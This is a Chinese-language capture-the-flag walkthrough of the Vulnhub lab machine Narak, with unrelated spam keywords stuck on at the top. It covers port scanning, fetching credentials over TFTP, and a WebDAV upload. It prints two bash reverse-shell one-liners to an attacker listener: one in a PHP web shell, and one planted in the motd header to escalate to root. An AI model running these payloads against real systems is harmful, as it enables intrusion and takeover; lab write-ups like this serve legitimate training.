在家做农业关注什么网站,重庆相册制作,app网站开发公司,跑腿app开发Narak靶机笔记
概述
Narak是一台Vulnhub的靶机#xff0c;其中有简单的tftp和webdav的利用#xff0c;以及motd文件的一些知识
靶机地址#xff1a; https://pan.baidu.com/s/1PbPrGJQHxsvGYrAN1k1New?pwda7kv
提取码: a7kv
当然你也可以去Vulnhub官网下载
一、nmap扫…Narak靶机笔记
概述
Narak是一台Vulnhub的靶机其中有简单的tftp和webdav的利用以及motd文件的一些知识
靶机地址 https://pan.baidu.com/s/1PbPrGJQHxsvGYrAN1k1New?pwda7kv
提取码: a7kv
当然你也可以去Vulnhub官网下载
一、nmap扫描
1主机发现
sudo nmap -sn 192.168.84.0/24Nmap scan report for 192.168.84.130
Host is up (0.00026s latency).
MAC Address: 00:0C:29:38:2B:28 (VMware)看到192.168.84.130是靶机ip
2端口扫描
a) TCP端口
sudo nmap -sT --min-rate 10000 -p- -o ports 192.168.84.130Nmap scan report for 192.168.84.130
Host is up (0.00017s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:38:2B:28 (VMware)# Nmap done at Fri Sep 20 11:59:44 2024 -- 1 IP address (1 host up) scanned in 1.91 secondsb) UDP端口
sudo nmap -sU --top-ports 20 -o udp 192.168.84.130Nmap scan report for 192.168.84.130
Host is up (0.00066s latency).PORT STATE SERVICE
53/udp open|filtered domain
67/udp closed dhcps
68/udp open|filtered dhcpc
69/udp open|filtered tftp
123/udp open|filtered ntp
135/udp closed msrpc
137/udp closed netbios-ns
138/udp open|filtered netbios-dgm
139/udp closed netbios-ssn
161/udp closed snmp
162/udp open|filtered snmptrap
445/udp closed microsoft-ds
500/udp closed isakmp
514/udp closed syslog
520/udp open|filtered route
631/udp closed ipp
1434/udp closed ms-sql-m
1900/udp open|filtered upnp
4500/udp closed nat-t-ike
49152/udp open|filtered unknown
MAC Address: 00:0C:29:38:2B:28 (VMware)# Nmap done at Fri Sep 20 12:01:21 2024 -- 1 IP address (1 host up) scanned in 7.99 seconds看到69号tftp可能是开放的一会可以看看有没有什么可以传输的文件
3详细信息扫描
sudo nmap -sT -sV -sC -O -p22,80 -o details 192.168.84.130Nmap scan report for 192.168.84.130
Host is up (0.00077s latency).PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 71bd592d221eb36b4f06bf83e1cc9243 (RSA)
| 256 f8ec45847f2933b28dfc7d07289331b0 (ECDSA)
|_ 256 d09436960480331040683221cbae68f9 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: HA: NARAK
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 00:0C:29:38:2B:28 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Sep 20 12:00:51 2024 -- 1 IP address (1 host up) scanned in 8.02 seconds二、web渗透
打开 80端口 没有什么有价值的信息我们进行目录爆破
1目录爆破
sudo gobuster dir -u http://192.168.84.130 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x zip,rar,txt,sqlGobuster v3.6
by OJ Reeves (TheColonial) Christian Mehlmauer (firefart)[] Url: http://192.168.84.130
[] Method: GET
[] Threads: 10
[] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[] Negative Status codes: 404
[] User Agent: gobuster/3.6
[] Extensions: txt,sql,zip,rar
[] Timeout: 10sStarting gobuster in directory enumeration mode/images (Status: 301) [Size: 317] [-- http://192.168.84.130/images/]
/tips.txt (Status: 200) [Size: 58]
/webdav (Status: 401) [Size: 461]
/server-status (Status: 403) [Size: 279]
Progress: 1102800 / 1102805 (100.00%)Finished看到几个目录和文件被扫描了出来我们全部打开看看 在tips.txt中他说打开narak的提示可以在creds.txt中找到。但是我们现在并不知道creds.txt在哪里 接着看webdav 他需要认证我们并没有有效地凭证信息
三、tftp渗透
在udp扫描中我们看到了tftp端口可能是开放的而我们在tips.txt文件中看到了一个存在creds.txt文件的信息
尝试一下
tftp 192.168.84.130tftp是一种简单的文件传输协议比较小巧搭建也很方便。他不能列出系统文件只能进行一些简单的文件操作 get creds.txtcat creds.txt
eWFtZG9vdDpTd2FyZw看到是类似于base64加密解秘看看
cat creds.txt | base64 -d
yamdoot:Swarg 发现了一组凭据yamdoot:Swarg
四、获得立足点
拿到凭据肯定要尝试ssh登陆 看到这并不是ssh的凭证那会不会是webdav的呢
尝试登陆webdav 成功登陆
用davtest测试以这个webdav服务
davtest -url http://192.168.84.130/webdav -auth yamdoot:Swarg********************************************************Testing DAV connection
OPEN SUCCEED: http://192.168.84.130/webdav
********************************************************
NOTE Random string for this session: _8C8yvKn
********************************************************Creating directory
MKCOL SUCCEED: Created http://192.168.84.130/webdav/DavTestDir__8C8yvKn
********************************************************Checking for test file execution
EXEC txt SUCCEED: http://192.168.84.130/webdav/DavTestDir__8C8yvKn/davtest__8C8yvKn.txt
EXEC txt FAIL
EXEC jsp FAIL
EXEC html SUCCEED: http://192.168.84.130/webdav/DavTestDir__8C8yvKn/davtest__8C8yvKn.html
EXEC html FAIL
EXEC asp FAIL
EXEC jhtml FAIL
EXEC aspx FAIL
EXEC pl FAIL
EXEC cfm FAIL
EXEC cgi FAIL
EXEC shtml FAIL
EXEC php SUCCEED: http://192.168.84.130/webdav/DavTestDir__8C8yvKn/davtest__8C8yvKn.php
EXEC php FAIL
********************************************************看到是可以解析php文件的构造php_reverse.php
?php system(bash -c bash -i /dev/tcp/192.168.84.128/4444 01); ?cadaver这是webdav服务的客户端 看到上传成功
kali本地监听并在浏览器访问php_rev.php 成功获得立足点
五、提权到root
通过查看可写文件找到了一些令我们感兴趣的
find / -writable -type f -not -path /proc/* -not -path /sys/* 2 /dev/null看到sh文件和motd文件 motdMessage of the Day文件用于在用户登录 Linux 系统时显示欢迎信息或通知。它通常用于向用户提供系统信息、公告、或其他登录时需要注意的事项。 cat hell.sh
#!/bin/bashechoHighway to Hell;
--[-----]---....--.[-]..--[---]--.-----..看到了一串beef字符串复制到hell文件中解密 看到了明文信息去碰撞一下ssh 一共有三个用户把用户放到users文件chitragupt放到pass文件 用ssh登陆进去 直接去motd文件下吧 这里可以在00-header文件中添加我们的提权逻辑
echo -e bash -c \bash -i /dev/tcp/192.168.84.128/8888 01\ 00-header在kali中监听8888端口并重新ssh登陆inferno用户 看到#提示符提权到了root权限
总结
通过nmap扫描我们发现22,80的TCP端口是开放的udp的69端口tftp服务可能是开启的进行目录爆破发现目标机器有webdav服务并且知道了目标有creds.txt文件。利用tftp协议拿到了creds.txt里面记录了webdav的凭证信息成功登陆webdav利用cadaver这个webdav客户端上传php反弹shell成功获得了立足点。翻找系统可写文件发现了一个sh和motd文件查看sh文件猜测是一个用户的ssh凭证用hydra成功爆破出ssh的凭证用motd的00-hearder文件的逻辑完成了提权操作
